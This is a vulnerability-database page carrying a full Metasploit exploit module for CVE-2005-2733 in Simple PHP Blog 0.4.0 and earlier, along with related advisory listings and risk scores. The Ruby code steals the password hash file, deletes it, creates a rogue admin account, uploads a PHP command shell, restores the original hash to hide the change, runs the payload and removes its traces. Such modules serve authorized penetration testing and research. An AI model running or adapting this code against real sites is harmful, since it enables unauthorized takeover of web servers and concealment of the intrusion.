Simple PHP Blog Remote Command Execution

🗓️ 16 Nov 2009 18:51:51Reported by Matteo Cantoni <[email protected]>, aushack <[email protected]>Type

Simple PHP Blog Remote Command Execution. Three vulnerabilities: unauthenticated access to password file, unrestricted file upload, arbitrary file deletion

Reporter	Title	Published	Views	Family All 10
GithubExploit	Systems-and-Cyber-Security-Coursework	11 Jun 202617:43	–	githubexploit
Tenable Nessus	Simple PHP Blog (SPHPBlog) <= 0.4.0 Multiple Vulnerabilities	26 Aug 200500:00	–	nessus
Tenable Nessus	Simple PHP Blog <= 0.4.0 Multiple Vulnerabilities	27 Aug 200500:00	–	nessus
Circl	CVE-2005-2733	25 Jul 201000:00	–	circl
CVE	CVE-2005-2733	29 Aug 200504:00	–	cve
Cvelist	CVE-2005-2733	29 Aug 200504:00	–	cvelist
Exploit DB	Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)	25 Jul 201000:00	–	exploitdb
NVD	CVE-2005-2733	30 Aug 200511:45	–	nvd
Packet Storm	Simple PHP Blog 0.4.0 Command Execution	30 Oct 200900:00	–	packetstorm
Prion	Design/Logic Flaw	24 Sep 200723:17	–	prion

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Simple PHP Blog Remote Command Execution',
      'Description'    => %q{
          This module combines three separate issues within The Simple PHP Blog (<= 0.4.0)
        application to upload arbitrary data and thus execute a shell. The first
        vulnerability exposes the hash file (password.txt) to unauthenticated users.
        The second vulnerability lies within the image upload system provided to
        logged-in users; there is no image validation function in the blogger to
        prevent an authenticated user from uploading any file type. The third
        vulnerability occurs within the blog comment functionality, allowing
        arbitrary files to be deleted.
      },
      'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-2733'],
          ['OSVDB', '19012'],
          ['BID', '14667'],
          ['EDB', '1191'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2005-08-25',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [true, "Sphpblog directory path", "/sphpblog"]),
      ])
  end

  def check
    res = send_request_raw({
      'uri'     => normalize_uri(datastore['URI'], '/index.php')
    }, 25)

    if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/)

      ver = [ $1.to_i, $2.to_i, $3.to_i ]
      vprint_status("Simple PHP Blog #{ver.join('.')}")

      if (ver[0] == 0 and ver[1] < 5)
        if (ver[1] == 4 and ver[2] > 0)
          return Exploit::CheckCode::Safe
        end
        return Exploit::CheckCode::Appears
      end
    end

    return Exploit::CheckCode::Safe
  end

  def retrieve_password_hash(file)

    res = send_request_raw({
      'uri'    => normalize_uri(datastore['URI'], file)
    }, 25)

    if (res and res.message == "OK" and res.body)
      print_good("Successfully retrieved hash: #{res.body}")
      return res.body
    else
      fail_with(Failure::NotVulnerable, "Failed to retrieve hash, server may not be vulnerable.")
      return false
    end
  end

  def create_new_password(user, pass)

    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI'], '/install03_cgi.php'),
      'method'  => 'POST',
      'data'    => "user=#{user}&pass=#{pass}",
    }, 25)

    if (res)
      print_good("Successfully created temporary account.")
    else
      print_error("Unable to create a temporary account!")
    end
  end

  def retrieve_session(user, pass)

    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI'], "/login_cgi.php"),
      'method'  => 'POST',
      'data'    => "user=#{user}&pass=#{pass}",
    }, 25)

    if res
      print_good("Successfully logged in as #{user}:#{pass}")

      if (res.get_cookies =~ /PHPSESSID=(.+);/)
        session = $1
        print_good("Successfully retrieved cookie: #{session}")
        return session
      else
        print_error("Error retrieving cookie!")
      end
    else
      print_error("No response received while logging in.")
    end
  end

  def upload_page(session, dir, newpage, contents)

    boundary = rand_text_alphanumeric(6)

    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"userfile\"; "
    data << "filename=\"#{newpage}\"\r\nContent-Type: text/plain\r\n\r\n"
    data << contents
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri'	  => normalize_uri(datastore['URI'], "/upload_img_cgi.php"),
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
      {
        'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
        'Content-Length' => data.length,
        'Cookie'	 => "my_id=#{session}; PHPSESSID=#{session}",
      }
    }, 25)

    if (res)
      print_good("Successfully uploaded #{newpage}")
    else
      print_error("Error uploading #{newpage}")
    end
  end

  def reset_original_password(hash, scriptlocation)

    res = send_request_cgi({
      'uri'	 => normalize_uri(datastore['URI'], scriptlocation),
      'method' => 'POST',
      'data'	 => "hash=" + hash,
    }, 25)

    if (res)
      print_good("Successfully reset original password hash.")
    else
      print_error("Error resetting original password!")
    end
  end

  def delete_file(file)

    delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}"

    res = send_request_raw({
      'uri'	=> normalize_uri(datastore['URI'], delete_path),
    }, 25)

    if (res)
      print_good("Successfully removed #{file}")
    else
      print_error("Error removing #{file}!")
    end
  end

  def cmd_shell(cmdpath)
    print_status("Calling payload: #{cmdpath}")

    res = send_request_raw({
      'uri'	=> datastore['URI'] + cmdpath
    }, 25)

  end

  def exploit

    # Define the scripts to be uploaded to aid in exploitation
    cmd_php = '<?php ' + payload.encoded + '?>'

    reset_php = %Q|
    <?php $hash = $_POST['hash'];
    $fp = fopen("../config/password.txt","w");
    fwrite($fp,$hash);
    fpclose($fp);
    ?>|

    # Generate some random strings
    cmdscript	= rand_text_alphanumeric(20) + '.php'
    resetscript	= rand_text_alphanumeric(20) + '.php'
    newuser 	= rand_text_alphanumeric(6)
    newpass 	= rand_text_alphanumeric(6)

    # Static files
    directory 	= '/images/'
    cmdpath 	= directory + cmdscript
    resetpath 	= directory + resetscript
    passwdfile 	= '/config/password.txt'

    # Let's do this thing
    hash = retrieve_password_hash(passwdfile)
    delete_file(passwdfile)
    create_new_password(newuser, newpass)
    session = retrieve_session(newuser, newpass)
    upload_page(session, directory, resetscript, reset_php)
    upload_page(session, directory, cmdscript, cmd_php)
    reset_original_password(hash, resetpath)
    delete_file(resetpath)
    cmd_shell(cmdpath)
    delete_file(cmdpath)
  end
end

02 Dec 2020 15:09Current

7.6High risk

Vulners AI Score7.6

CVSS 27.5

EPSS0.50888